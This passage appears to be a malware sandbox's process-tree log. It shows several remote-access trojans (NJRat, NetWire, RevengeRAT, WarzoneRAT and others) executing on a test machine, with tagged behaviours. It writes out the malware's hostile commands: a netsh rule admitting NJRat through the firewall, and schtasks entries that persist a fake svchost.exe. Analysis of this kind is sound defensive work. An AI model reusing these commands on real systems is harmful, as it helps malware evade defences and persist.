C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3048 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Executes dropped EXE
PID:2108 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:3936
-
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Executes dropped EXE
PID:2252 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:2116
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:12⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7116 /prefetch:82⤵PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7256 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:880
-
-
C:\Users\Admin\Downloads\NJRat.exe"C:\Users\Admin\Downloads\NJRat.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:2328 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Downloads\NJRat.exe" "NJRat.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2304
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:12⤵PID:1824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5328 /prefetch:82⤵PID:2292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7360 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:2192
-
-
C:\Users\Admin\Downloads\NetWire.exe"C:\Users\Admin\Downloads\NetWire.exe"2⤵
- Executes dropped EXE
PID:3488 -
C:\Users\Admin\Downloads\NetWire.exe"C:\Users\Admin\Downloads\NetWire.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4812 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:2088
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:12⤵PID:4976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6444 /prefetch:82⤵PID:2456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7408 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:3476
-
-
C:\Users\Admin\Downloads\RevengeRAT.exe"C:\Users\Admin\Downloads\RevengeRAT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1436 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Drops startup file
- Suspicious use of SetThreadContext
- NTFS ADS
PID:2856 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"4⤵PID:3988
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q6xquj2k.cmdline"4⤵PID:5496
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE47C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE65743EB3704697BC8CC63388A4E57.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:5768
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vo-ewgsx.cmdline"4⤵PID:5948
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE518.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc28074EE8476C48AA8ED6E6DE3D15C17.TMP"5⤵PID:5208
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-pbkpupm.cmdline"4⤵PID:5528
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE585.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc721CE011AD7C4B7481F1EFCB54F02CB5.TMP"5⤵PID:5936
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1y1wdavs.cmdline"4⤵PID:5204
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE612.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc99DEE7DD3E874E1A975B9445DF8126.TMP"5⤵PID:5868
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\oe-umgbz.cmdline"4⤵
- System Location Discovery: System Language Discovery
PID:5376 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4F2073E7A0E04299A8497FEBE9502EDA.TMP"5⤵PID:5636
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\eknob0af.cmdline"4⤵PID:1980
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE74A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD781DC1779E14586AE4161FBF7EAC172.TMP"5⤵PID:3876
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\7sjddnqt.cmdline"4⤵PID:1828
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE7C7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC21B72DE1F5F4A46A7A83E844C0A714.TMP"5⤵PID:4728
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vnfcj_y_.cmdline"4⤵
- System Location Discovery: System Language Discovery
PID:4120 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE8E1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDF132745950C4F26AC60CECABF9DCF81.TMP"5⤵PID:6116
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\d8f_c0zn.cmdline"4⤵PID:2848
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE96D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEEF927DBD830499FBF1702C39CD6C69.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:4100
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jypthmud.cmdline"4⤵PID:1872
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA29.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc620AC4391C204573B182AD37BA86F6A0.TMP"5⤵PID:1080
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\5hxywqt5.cmdline"4⤵PID:3352
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB04.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA1C213B17BB0440A853D574783397DEA.TMP"5⤵PID:2244
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cuvjhepc.cmdline"4⤵PID:1924
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEBCF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB16E6E8E3A5D4912934CF68814CAEFE0.TMP"5⤵PID:2252
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\isz2u0gd.cmdline"4⤵PID:3696
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC4C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE7AB75384D11411BA5401E16CA71A93.TMP"5⤵PID:1992
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uhu-najg.cmdline"4⤵PID:3532
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED46.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc61745F29B4A94F4CA8238C36587CAAA.TMP"5⤵PID:4536
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-4khe5qe.cmdline"4⤵PID:1612
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE30.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc23530DAEB6B645BEBEEE5FDCCFD7567.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:5320
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ytds4hvg.cmdline"4⤵PID:5416
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEEDC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc646D2FB94BCC4F3EBF5EB72A4B1E9CA.TMP"5⤵PID:3744
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\d7vp8w5w.cmdline"4⤵
- System Location Discovery: System Language Discovery
PID:5848 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF88.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDB16597882BF4A2982AECB4030D01FB.TMP"5⤵PID:5172
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6mgdjqtd.cmdline"4⤵PID:1276
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF063.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE8211094F9BD482A971B96671F3D4142.TMP"5⤵PID:2924
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\stuz49pd.cmdline"4⤵PID:5460
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0EF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA74D00FEA3C544D1BED3CC51EC8EE88.TMP"5⤵PID:5516
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uljbndha.cmdline"4⤵PID:5892
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF16C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2F995A97782C4D5C82576AC1B4689A2.TMP"5⤵PID:6108
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2d8qudjt.cmdline"4⤵PID:5448
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF208.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF91818E93B504078ACC988941BBE3C94.TMP"5⤵PID:5504
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:548 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"5⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- NTFS ADS
PID:4744 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"6⤵PID:4980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5360
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ocnzx2mj.cmdline"6⤵PID:5832
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA1D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF6D48A4BA0BC44988656E67E8B64D3E2.TMP"7⤵PID:4368
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qjshrs8e.cmdline"6⤵PID:2908
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAAD9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFB52FD8B6EF14CB599F46E15A29E41E.TMP"7⤵PID:6120
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\z3xrn47o.cmdline"6⤵PID:5744
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABA4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4422C4E6DC664178A147312DAB08CEF.TMP"7⤵PID:5708
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q5ecrx4q.cmdline"6⤵PID:5400
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC40.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc994F3956B6C245F28A89AF84C19CD125.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:5616
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pzxkh9qh.cmdline"6⤵
- System Location Discovery: System Language Discovery
PID:5372 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESACAE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9BD7B1684A4C472BAF31EB7ED0353097.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:5444
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dlgrnvxm.cmdline"6⤵PID:964
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD88.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc66E1BF799E14FBC867E174EBFDA155.TMP"7⤵PID:1240
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ahhpmibz.cmdline"6⤵PID:2208
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE82.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4511A507F40246E7BCEC35BBB8A824C9.TMP"7⤵PID:6068
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wni0eu2d.cmdline"6⤵PID:4564
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF1F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc130BB9AFFD1A42BEA564A81C209E3081.TMP"7⤵PID:5972
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1wys_npk.cmdline"6⤵PID:3820
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAFBB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2AD95FD171EA44DEB23CEFDA677F1AB4.TMP"7⤵PID:1704
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\c-pxhf0i.cmdline"6⤵PID:2492
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB038.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc272530A3AD654AEAACB01E9448355039.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:2496
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\piyhyrni.cmdline"6⤵PID:3432
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2F22.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB62D42C246034B9589DA5EED90B1150.TMP"7⤵PID:5148
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:12⤵PID:5260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5988 /prefetch:82⤵PID:5332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6448 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5992
-
-
C:\Users\Admin\Downloads\WarzoneRAT.exe"C:\Users\Admin\Downloads\WarzoneRAT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- NTFS ADS
PID:5688 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE8C1.tmp"3⤵
